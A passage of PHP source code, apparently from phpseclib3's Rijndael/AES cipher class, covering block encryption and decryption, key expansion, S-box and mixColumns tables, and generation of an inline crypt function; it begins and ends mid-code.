$c[2]; $l = $c[3]; while ($i < $Nb) { $temp[$i] = $t0[$state[$i] >> 24 & 0x000000FF] ^ $t1[$state[$j] >> 16 & 0x000000FF] ^ $t2[$state[$k] >> 8 & 0x000000FF] ^ $t3[$state[$l] & 0x000000FF] ^ $w[++$wc]; ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } $state = $temp; } // subWord for ($i = 0; $i < $Nb; ++$i) { $state[$i] = $sbox[$state[$i] & 0x000000FF] | ($sbox[$state[$i] >> 8 & 0x000000FF] << 8) | ($sbox[$state[$i] >> 16 & 0x000000FF] << 16) | ($sbox[$state[$i] >> 24 & 0x000000FF] << 24); } // shiftRows + addRoundKey $i = 0; // $c[0] == 0 $j = $c[1]; $k = $c[2]; $l = $c[3]; while ($i < $Nb) { $temp[$i] = ($state[$i] & intval(0xFF000000)) ^ ($state[$j] & 0x00FF0000) ^ ($state[$k] & 0x0000FF00) ^ ($state[$l] & 0x000000FF) ^ $w[$i]; ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } return pack('N*', ...$temp); } /** * Decrypts a block * * @param string $in * @return string */ protected function decryptBlock($in) { static $invtables; if (empty($invtables)) { $invtables = &$this->getInvTables(); } $dt0 = $invtables[0]; $dt1 = $invtables[1]; $dt2 = $invtables[2]; $dt3 = $invtables[3]; $isbox = $invtables[4]; $state = []; $words = unpack('N*', $in); $c = $this->c; $dw = $this->dw; $Nb = $this->Nb; $Nr = $this->Nr; // addRoundKey $wc = $Nb - 1; foreach ($words as $word) { $state[] = $word ^ $dw[++$wc]; } $temp = []; for ($round = $Nr - 1; $round > 0; --$round) { $i = 0; // $c[0] == 0 $j = $Nb - $c[1]; $k = $Nb - $c[2]; $l = $Nb - $c[3]; while ($i < $Nb) { $temp[$i] = $dt0[$state[$i] >> 24 & 0x000000FF] ^ $dt1[$state[$j] >> 16 & 0x000000FF] ^ $dt2[$state[$k] >> 8 & 0x000000FF] ^ $dt3[$state[$l] & 0x000000FF] ^ $dw[++$wc]; ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } $state = $temp; } // invShiftRows + invSubWord + addRoundKey $i = 0; // $c[0] == 0 $j = $Nb - $c[1]; $k = $Nb - $c[2]; $l = $Nb - $c[3]; while ($i < $Nb) { $word = ($state[$i] & intval(0xFF000000)) | ($state[$j] & 0x00FF0000) | ($state[$k] & 0x0000FF00) | ($state[$l] & 0x000000FF); $temp[$i] = $dw[$i] ^ ($isbox[$word & 0x000000FF] | ($isbox[$word >> 8 & 0x000000FF] << 8) | ($isbox[$word >> 16 & 0x000000FF] << 16) | ($isbox[$word >> 24 & 0x000000FF] << 24)); ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } return pack('N*', ...$temp); } /** * Setup the self::ENGINE_INTERNAL $engine * * (re)init, if necessary, the internal cipher $engine and flush all $buffers * Used (only) if $engine == self::ENGINE_INTERNAL * * _setup() will be called each time if $changed === true * typically this happens when using one or more of following public methods: * * - setKey() * * - setIV() * * - disableContinuousBuffer() * * - First run of encrypt() / decrypt() with no init-settings * * {@internal setup() is always called before en/decryption.} * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see self::setKey() * @see self::setIV() * @see self::disableContinuousBuffer() */ protected function setup() { if (!$this->changed) { return; } parent::setup(); if (is_string($this->iv) && strlen($this->iv) != $this->block_size) { throw new InconsistentSetupException('The IV length (' . strlen($this->iv) . ') does not match the block size (' . $this->block_size . ')'); } } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { // Each number in $rcon is equal to the previous number multiplied by two in Rijndael's finite field. // See http://en.wikipedia.org/wiki/Finite_field_arithmetic#Multiplicative_inverse static $rcon; if (!isset($rcon)) { $rcon = [0, 0x01000000, 0x02000000, 0x04000000, 0x08000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x1B000000, 0x36000000, 0x6C000000, 0xD8000000, 0xAB000000, 0x4D000000, 0x9A000000, 0x2F000000, 0x5E000000, 0xBC000000, 0x63000000, 0xC6000000, 0x97000000, 0x35000000, 0x6A000000, 0xD4000000, 0xB3000000, 0x7D000000, 0xFA000000, 0xEF000000, 0xC5000000, 0x91000000 ]; $rcon = array_map('intval', $rcon); } if (isset($this->kl['key']) && $this->key === $this->kl['key'] && $this->key_length === $this->kl['key_length'] && $this->block_size === $this->kl['block_size']) { // already expanded return; } $this->kl = ['key' => $this->key, 'key_length' => $this->key_length, 'block_size' => $this->block_size]; $this->Nk = $this->key_length >> 2; // see Rijndael-ammended.pdf#page=44 $this->Nr = max($this->Nk, $this->Nb) + 6; // shift offsets for Nb = 5, 7 are defined in Rijndael-ammended.pdf#page=44, // "Table 8: Shift offsets in Shiftrow for the alternative block lengths" // shift offsets for Nb = 4, 6, 8 are defined in Rijndael-ammended.pdf#page=14, // "Table 2: Shift offsets for different block lengths" switch ($this->Nb) { case 4: case 5: case 6: $this->c = [0, 1, 2, 3]; break; case 7: $this->c = [0, 1, 2, 4]; break; case 8: $this->c = [0, 1, 3, 4]; } $w = array_values(unpack('N*words', $this->key)); $length = $this->Nb * ($this->Nr + 1); for ($i = $this->Nk; $i < $length; $i++) { $temp = $w[$i - 1]; if ($i % $this->Nk == 0) { // according to , "the size of an integer is platform-dependent". // on a 32-bit machine, it's 32-bits, and on a 64-bit machine, it's 64-bits. on a 32-bit machine, // 0xFFFFFFFF << 8 == 0xFFFFFF00, but on a 64-bit machine, it equals 0xFFFFFFFF00. as such, doing 'and' // with 0xFFFFFFFF (or 0xFFFFFF00) on a 32-bit machine is unnecessary, but on a 64-bit machine, it is. $temp = (($temp << 8) & intval(0xFFFFFF00)) | (($temp >> 24) & 0x000000FF); // rotWord $temp = $this->subWord($temp) ^ $rcon[$i / $this->Nk]; } elseif ($this->Nk > 6 && $i % $this->Nk == 4) { $temp = $this->subWord($temp); } $w[$i] = $w[$i - $this->Nk] ^ $temp; } // convert the key schedule from a vector of $Nb * ($Nr + 1) length to a matrix with $Nr + 1 rows and $Nb columns // and generate the inverse key schedule. more specifically, // according to (section 5.3.3), // "The key expansion for the Inverse Cipher is defined as follows: // 1. Apply the Key Expansion. // 2. Apply InvMixColumn to all Round Keys except the first and the last one." // also, see fips-197.pdf#page=27, "5.3.5 Equivalent Inverse Cipher" list($dt0, $dt1, $dt2, $dt3) = $this->getInvTables(); $temp = $this->w = $this->dw = []; for ($i = $row = $col = 0; $i < $length; $i++, $col++) { if ($col == $this->Nb) { if ($row == 0) { $this->dw[0] = $this->w[0]; } else { // subWord + invMixColumn + invSubWord = invMixColumn $j = 0; while ($j < $this->Nb) { $dw = $this->subWord($this->w[$row][$j]); $temp[$j] = $dt0[$dw >> 24 & 0x000000FF] ^ $dt1[$dw >> 16 & 0x000000FF] ^ $dt2[$dw >> 8 & 0x000000FF] ^ $dt3[$dw & 0x000000FF]; $j++; } $this->dw[$row] = $temp; } $col = 0; $row++; } $this->w[$row][$col] = $w[$i]; } $this->dw[$row] = $this->w[$row]; // Converting to 1-dim key arrays (both ascending) $this->dw = array_reverse($this->dw); $w = array_pop($this->w); $dw = array_pop($this->dw); foreach ($this->w as $r => $wr) { foreach ($wr as $c => $wc) { $w[] = $wc; $dw[] = $this->dw[$r][$c]; } } $this->w = $w; $this->dw = $dw; } /** * Performs S-Box substitutions * * @return array * @param int $word */ private function subWord($word) { static $sbox; if (empty($sbox)) { list(, , , , $sbox) = self::getTables(); } return $sbox[$word & 0x000000FF] | ($sbox[$word >> 8 & 0x000000FF] << 8) | ($sbox[$word >> 16 & 0x000000FF] << 16) | ($sbox[$word >> 24 & 0x000000FF] << 24); } /** * Provides the mixColumns and sboxes tables * * @see self::encryptBlock() * @see self::setupInlineCrypt() * @see self::subWord() * @return array &$tables */ protected function &getTables() { static $tables; if (empty($tables)) { // according to (section 5.2.1), // precomputed tables can be used in the mixColumns phase. in that example, they're assigned t0...t3, so // those are the names we'll use. $t3 = array_map('intval', [ // with array_map('intval', ...) we ensure we have only int's and not // some slower floats converted by php automatically on high values 0x6363A5C6, 0x7C7C84F8, 0x777799EE, 0x7B7B8DF6, 0xF2F20DFF, 0x6B6BBDD6, 0x6F6FB1DE, 0xC5C55491, 0x30305060, 0x01010302, 0x6767A9CE, 0x2B2B7D56, 0xFEFE19E7, 0xD7D762B5, 0xABABE64D, 0x76769AEC, 0xCACA458F, 0x82829D1F, 0xC9C94089, 0x7D7D87FA, 0xFAFA15EF, 0x5959EBB2, 0x4747C98E, 0xF0F00BFB, 0xADADEC41, 0xD4D467B3, 0xA2A2FD5F, 0xAFAFEA45, 0x9C9CBF23, 0xA4A4F753, 0x727296E4, 0xC0C05B9B, 0xB7B7C275, 0xFDFD1CE1, 0x9393AE3D, 0x26266A4C, 0x36365A6C, 0x3F3F417E, 0xF7F702F5, 0xCCCC4F83, 0x34345C68, 0xA5A5F451, 0xE5E534D1, 0xF1F108F9, 0x717193E2, 0xD8D873AB, 0x31315362, 0x15153F2A, 0x04040C08, 0xC7C75295, 0x23236546, 0xC3C35E9D, 0x18182830, 0x9696A137, 0x05050F0A, 0x9A9AB52F, 0x0707090E, 0x12123624, 0x80809B1B, 0xE2E23DDF, 0xEBEB26CD, 0x2727694E, 0xB2B2CD7F, 0x75759FEA, 0x09091B12, 0x83839E1D, 0x2C2C7458, 0x1A1A2E34, 0x1B1B2D36, 0x6E6EB2DC, 0x5A5AEEB4, 0xA0A0FB5B, 0x5252F6A4, 0x3B3B4D76, 0xD6D661B7, 0xB3B3CE7D, 0x29297B52, 0xE3E33EDD, 0x2F2F715E, 0x84849713, 0x5353F5A6, 0xD1D168B9, 0x00000000, 0xEDED2CC1, 0x20206040, 0xFCFC1FE3, 0xB1B1C879, 0x5B5BEDB6, 0x6A6ABED4, 0xCBCB468D, 0xBEBED967, 0x39394B72, 0x4A4ADE94, 0x4C4CD498, 0x5858E8B0, 0xCFCF4A85, 0xD0D06BBB, 0xEFEF2AC5, 0xAAAAE54F, 0xFBFB16ED, 0x4343C586, 0x4D4DD79A, 0x33335566, 0x85859411, 0x4545CF8A, 0xF9F910E9, 0x02020604, 0x7F7F81FE, 0x5050F0A0, 0x3C3C4478, 0x9F9FBA25, 0xA8A8E34B, 0x5151F3A2, 0xA3A3FE5D, 0x4040C080, 0x8F8F8A05, 0x9292AD3F, 0x9D9DBC21, 0x38384870, 0xF5F504F1, 0xBCBCDF63, 0xB6B6C177, 0xDADA75AF, 0x21216342, 0x10103020, 0xFFFF1AE5, 0xF3F30EFD, 0xD2D26DBF, 0xCDCD4C81, 0x0C0C1418, 0x13133526, 0xECEC2FC3, 0x5F5FE1BE, 0x9797A235, 0x4444CC88, 0x1717392E, 0xC4C45793, 0xA7A7F255, 0x7E7E82FC, 0x3D3D477A, 0x6464ACC8, 0x5D5DE7BA, 0x19192B32, 0x737395E6, 0x6060A0C0, 0x81819819, 0x4F4FD19E, 0xDCDC7FA3, 0x22226644, 0x2A2A7E54, 0x9090AB3B, 0x8888830B, 0x4646CA8C, 0xEEEE29C7, 0xB8B8D36B, 0x14143C28, 0xDEDE79A7, 0x5E5EE2BC, 0x0B0B1D16, 0xDBDB76AD, 0xE0E03BDB, 0x32325664, 0x3A3A4E74, 0x0A0A1E14, 0x4949DB92, 0x06060A0C, 0x24246C48, 0x5C5CE4B8, 0xC2C25D9F, 0xD3D36EBD, 0xACACEF43, 0x6262A6C4, 0x9191A839, 0x9595A431, 0xE4E437D3, 0x79798BF2, 0xE7E732D5, 0xC8C8438B, 0x3737596E, 0x6D6DB7DA, 0x8D8D8C01, 0xD5D564B1, 0x4E4ED29C, 0xA9A9E049, 0x6C6CB4D8, 0x5656FAAC, 0xF4F407F3, 0xEAEA25CF, 0x6565AFCA, 0x7A7A8EF4, 0xAEAEE947, 0x08081810, 0xBABAD56F, 0x787888F0, 0x25256F4A, 0x2E2E725C, 0x1C1C2438, 0xA6A6F157, 0xB4B4C773, 0xC6C65197, 0xE8E823CB, 0xDDDD7CA1, 0x74749CE8, 0x1F1F213E, 0x4B4BDD96, 0xBDBDDC61, 0x8B8B860D, 0x8A8A850F, 0x707090E0, 0x3E3E427C, 0xB5B5C471, 0x6666AACC, 0x4848D890, 0x03030506, 0xF6F601F7, 0x0E0E121C, 0x6161A3C2, 0x35355F6A, 0x5757F9AE, 0xB9B9D069, 0x86869117, 0xC1C15899, 0x1D1D273A, 0x9E9EB927, 0xE1E138D9, 0xF8F813EB, 0x9898B32B, 0x11113322, 0x6969BBD2, 0xD9D970A9, 0x8E8E8907, 0x9494A733, 0x9B9BB62D, 0x1E1E223C, 0x87879215, 0xE9E920C9, 0xCECE4987, 0x5555FFAA, 0x28287850, 0xDFDF7AA5, 0x8C8C8F03, 0xA1A1F859, 0x89898009, 0x0D0D171A, 0xBFBFDA65, 0xE6E631D7, 0x4242C684, 0x6868B8D0, 0x4141C382, 0x9999B029, 0x2D2D775A, 0x0F0F111E, 0xB0B0CB7B, 0x5454FCA8, 0xBBBBD66D, 0x16163A2C ]); foreach ($t3 as $t3i) { $t0[] = (($t3i << 24) & intval(0xFF000000)) | (($t3i >> 8) & 0x00FFFFFF); $t1[] = (($t3i << 16) & intval(0xFFFF0000)) | (($t3i >> 16) & 0x0000FFFF); $t2[] = (($t3i << 8) & intval(0xFFFFFF00)) | (($t3i >> 24) & 0x000000FF); } $tables = [ // The Precomputed mixColumns tables t0 - t3 $t0, $t1, $t2, $t3, // The SubByte S-Box [ 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 ] ]; } return $tables; } /** * Provides the inverse mixColumns and inverse sboxes tables * * @see self::decryptBlock() * @see self::setupInlineCrypt() * @see self::setupKey() * @return array &$tables */ protected function &getInvTables() { static $tables; if (empty($tables)) { $dt3 = array_map('intval', [ 0xF4A75051, 0x4165537E, 0x17A4C31A, 0x275E963A, 0xAB6BCB3B, 0x9D45F11F, 0xFA58ABAC, 0xE303934B, 0x30FA5520, 0x766DF6AD, 0xCC769188, 0x024C25F5, 0xE5D7FC4F, 0x2ACBD7C5, 0x35448026, 0x62A38FB5, 0xB15A49DE, 0xBA1B6725, 0xEA0E9845, 0xFEC0E15D, 0x2F7502C3, 0x4CF01281, 0x4697A38D, 0xD3F9C66B, 0x8F5FE703, 0x929C9515, 0x6D7AEBBF, 0x5259DA95, 0xBE832DD4, 0x7421D358, 0xE0692949, 0xC9C8448E, 0xC2896A75, 0x8E7978F4, 0x583E6B99, 0xB971DD27, 0xE14FB6BE, 0x88AD17F0, 0x20AC66C9, 0xCE3AB47D, 0xDF4A1863, 0x1A3182E5, 0x51336097, 0x537F4562, 0x6477E0B1, 0x6BAE84BB, 0x81A01CFE, 0x082B94F9, 0x48685870, 0x45FD198F, 0xDE6C8794, 0x7BF8B752, 0x73D323AB, 0x4B02E272, 0x1F8F57E3, 0x55AB2A66, 0xEB2807B2, 0xB5C2032F, 0xC57B9A86, 0x3708A5D3, 0x2887F230, 0xBFA5B223, 0x036ABA02, 0x16825CED, 0xCF1C2B8A, 0x79B492A7, 0x07F2F0F3, 0x69E2A14E, 0xDAF4CD65, 0x05BED506, 0x34621FD1, 0xA6FE8AC4, 0x2E539D34, 0xF355A0A2, 0x8AE13205, 0xF6EB75A4, 0x83EC390B, 0x60EFAA40, 0x719F065E, 0x6E1051BD, 0x218AF93E, 0xDD063D96, 0x3E05AEDD, 0xE6BD464D, 0x548DB591, 0xC45D0571, 0x06D46F04, 0x5015FF60, 0x98FB2419, 0xBDE997D6, 0x4043CC89, 0xD99E7767, 0xE842BDB0, 0x898B8807, 0x195B38E7, 0xC8EEDB79, 0x7C0A47A1, 0x420FE97C, 0x841EC9F8, 0x00000000, 0x80868309, 0x2BED4832, 0x1170AC1E, 0x5A724E6C, 0x0EFFFBFD, 0x8538560F, 0xAED51E3D, 0x2D392736, 0x0FD9640A, 0x5CA62168, 0x5B54D19B, 0x362E3A24, 0x0A67B10C, 0x57E70F93, 0xEE96D2B4, 0x9B919E1B, 0xC0C54F80, 0xDC20A261, 0x774B695A, 0x121A161C, 0x93BA0AE2, 0xA02AE5C0, 0x22E0433C, 0x1B171D12, 0x090D0B0E, 0x8BC7ADF2, 0xB6A8B92D, 0x1EA9C814, 0xF1198557, 0x75074CAF, 0x99DDBBEE, 0x7F60FDA3, 0x01269FF7, 0x72F5BC5C, 0x663BC544, 0xFB7E345B, 0x4329768B, 0x23C6DCCB, 0xEDFC68B6, 0xE4F163B8, 0x31DCCAD7, 0x63851042, 0x97224013, 0xC6112084, 0x4A247D85, 0xBB3DF8D2, 0xF93211AE, 0x29A16DC7, 0x9E2F4B1D, 0xB230F3DC, 0x8652EC0D, 0xC1E3D077, 0xB3166C2B, 0x70B999A9, 0x9448FA11, 0xE9642247, 0xFC8CC4A8, 0xF03F1AA0, 0x7D2CD856, 0x3390EF22, 0x494EC787, 0x38D1C1D9, 0xCAA2FE8C, 0xD40B3698, 0xF581CFA6, 0x7ADE28A5, 0xB78E26DA, 0xADBFA43F, 0x3A9DE42C, 0x78920D50, 0x5FCC9B6A, 0x7E466254, 0x8D13C2F6, 0xD8B8E890, 0x39F75E2E, 0xC3AFF582, 0x5D80BE9F, 0xD0937C69, 0xD52DA96F, 0x2512B3CF, 0xAC993BC8, 0x187DA710, 0x9C636EE8, 0x3BBB7BDB, 0x267809CD, 0x5918F46E, 0x9AB701EC, 0x4F9AA883, 0x956E65E6, 0xFFE67EAA, 0xBCCF0821, 0x15E8E6EF, 0xE79BD9BA, 0x6F36CE4A, 0x9F09D4EA, 0xB07CD629, 0xA4B2AF31, 0x3F23312A, 0xA59430C6, 0xA266C035, 0x4EBC3774, 0x82CAA6FC, 0x90D0B0E0, 0xA7D81533, 0x04984AF1, 0xECDAF741, 0xCD500E7F, 0x91F62F17, 0x4DD68D76, 0xEFB04D43, 0xAA4D54CC, 0x9604DFE4, 0xD1B5E39E, 0x6A881B4C, 0x2C1FB8C1, 0x65517F46, 0x5EEA049D, 0x8C355D01, 0x877473FA, 0x0B412EFB, 0x671D5AB3, 0xDBD25292, 0x105633E9, 0xD647136D, 0xD7618C9A, 0xA10C7A37, 0xF8148E59, 0x133C89EB, 0xA927EECE, 0x61C935B7, 0x1CE5EDE1, 0x47B13C7A, 0xD2DF599C, 0xF2733F55, 0x14CE7918, 0xC737BF73, 0xF7CDEA53, 0xFDAA5B5F, 0x3D6F14DF, 0x44DB8678, 0xAFF381CA, 0x68C43EB9, 0x24342C38, 0xA3405FC2, 0x1DC37216, 0xE2250CBC, 0x3C498B28, 0x0D9541FF, 0xA8017139, 0x0CB3DE08, 0xB4E49CD8, 0x56C19064, 0xCB84617B, 0x32B670D5, 0x6C5C7448, 0xB85742D0 ]); foreach ($dt3 as $dt3i) { $dt0[] = (($dt3i << 24) & intval(0xFF000000)) | (($dt3i >> 8) & 0x00FFFFFF); $dt1[] = (($dt3i << 16) & intval(0xFFFF0000)) | (($dt3i >> 16) & 0x0000FFFF); $dt2[] = (($dt3i << 8) & intval(0xFFFFFF00)) | (($dt3i >> 24) & 0x000000FF); }; $tables = [ // The Precomputed inverse mixColumns tables dt0 - dt3 $dt0, $dt1, $dt2, $dt3, // The inverse SubByte S-Box [ 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, 0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D ] ]; } return $tables; } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupInlineCrypt() */ protected function setupInlineCrypt() { $w = $this->w; $dw = $this->dw; $init_encrypt = ''; $init_decrypt = ''; $Nr = $this->Nr; $Nb = $this->Nb; $c = $this->c; // Generating encrypt code: $init_encrypt .= ' if (empty($tables)) { $tables = &$this->getTables(); } $t0 = $tables[0]; $t1 = $tables[1]; $t2 = $tables[2]; $t3 = $tables[3]; $sbox = $tables[4]; '; $s = 'e'; $e = 's'; $wc = $Nb - 1; // Preround: addRoundKey $encrypt_block = '$in = unpack("N*", $in);' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= '$s' . $i . ' = $in[' . ($i + 1) . '] ^ ' . $w[++$wc] . ";\n"; } // Mainrounds: shiftRows + subWord + mixColumns + addRoundKey for ($round = 1; $round < $Nr; ++$round) { list($s, $e) = [$e, $s]; for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= '$' . $e . $i . ' = $t0[($' . $s . $i . ' >> 24) & 0xff] ^ $t1[($' . $s . (($i + $c[1]) % $Nb) . ' >> 16) & 0xff] ^ $t2[($' . $s . (($i + $c[2]) % $Nb) . ' >> 8) & 0xff] ^ $t3[ $' . $s . (($i + $c[3]) % $Nb) . ' & 0xff] ^ ' . $w[++$wc] . ";\n"; } } // Finalround: subWord + shiftRows + addRoundKey for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= '$' . $e . $i . ' = $sbox[ $' . $e . $i . ' & 0xff] | ($sbox[($' . $e . $i . ' >> 8) & 0xff] << 8) | ($sbox[($' . $e . $i . ' >> 16) & 0xff] << 16) | ($sbox[($' . $e . $i . ' >> 24) & 0xff] << 24);' . "\n"; } $encrypt_block .= '$in = pack("N*"' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= ', ($' . $e . $i . ' & ' . ((int)0xFF000000) . ') ^ ($' . $e . (($i + $c[1]) % $Nb) . ' & 0x00FF0000 ) ^ ($' . $e . (($i + $c[2]) % $Nb) . ' & 0x0000FF00 ) ^ ($' . $e . (($i + $c[3]) % $Nb) . ' & 0x000000FF ) ^ ' . $w[$i] . "\n"; } $encrypt_block .= ');'; // Generating decrypt code: $init_decrypt .= ' if (empty($invtables)) { $invtables = &$this->getInvTables(); } $dt0 = $invtables[0]; $dt1 = $invtables[1]; $dt2 = $invtables[2]; $dt3 = $invtables[3]; $isbox = $invtables[4]; '; $s = 'e'; $e = 's'; $wc = $Nb - 1; // Preround: addRoundKey $decrypt_block = '$in = unpack("N*", $in);' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= '$s' . $i . ' = $in[' . ($i + 1) . '] ^ ' . $dw[++$wc] . ';' . "\n"; } // Mainrounds: shiftRows + subWord + mixColumns + addRoundKey for ($round = 1; $round < $Nr; ++$round) { list($s, $e) = [$e, $s]; for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= '$' . $e . $i . ' = $dt0[($' . $s . $i . ' >> 24) & 0xff] ^ $dt1[($' . $s . (($Nb + $i - $c[1]) % $Nb) . ' >> 16) & 0xff] ^ $dt2[($' . $s . (($Nb + $i - $c[2]) % $Nb) . ' >> 8) & 0xff] ^ $dt3[ $' . $s . (($Nb + $i - $c[3]) % $Nb) . ' & 0xff] ^ ' . $dw[++$wc] . ";\n"; } } // Finalround: subWord + shiftRows + addRoundKey for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= '$' . $e . $i . ' = $isbox[ $' . $e . $i . ' & 0xff] | ($isbox[($' . $e . $i . ' >> 8) & 0xff] << 8) | ($isbox[($' . $e . $i . ' >> 16) & 0xff] << 16) | ($isbox[($' . $e . $i . ' >> 24) & 0xff] << 24);' . "\n"; } $decrypt_block .= '$in = pack("N*"' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= ', ($' . $e . $i . ' & ' . ((int)0xFF000000) . ') ^ ($' . $e . (($Nb + $i - $c[1]) % $Nb) . ' & 0x00FF0000 ) ^ ($' . $e . (($Nb + $i - $c[2]) % $Nb) . ' & 0x0000FF00 ) ^ ($' . $e . (($Nb + $i - $c[3]) % $Nb) . ' & 0x000000FF ) ^ ' . $dw[$i] . "\n"; } $decrypt_block .= ');'; $this->inline_crypt = $this->createInlineCryptFunction( [ 'init_crypt' => 'static $tables; static $invtables;', 'init_encrypt' => $init_encrypt, 'init_decrypt' => $init_decrypt, 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block ] ); } /** * Encrypts a message. * * @see self::decrypt() * @see parent::encrypt() * @param string $plaintext * @return string */ public function encrypt($plaintext) { $this->setup(); switch ($this->engine) { case self::ENGINE_LIBSODIUM: $this->newtag = 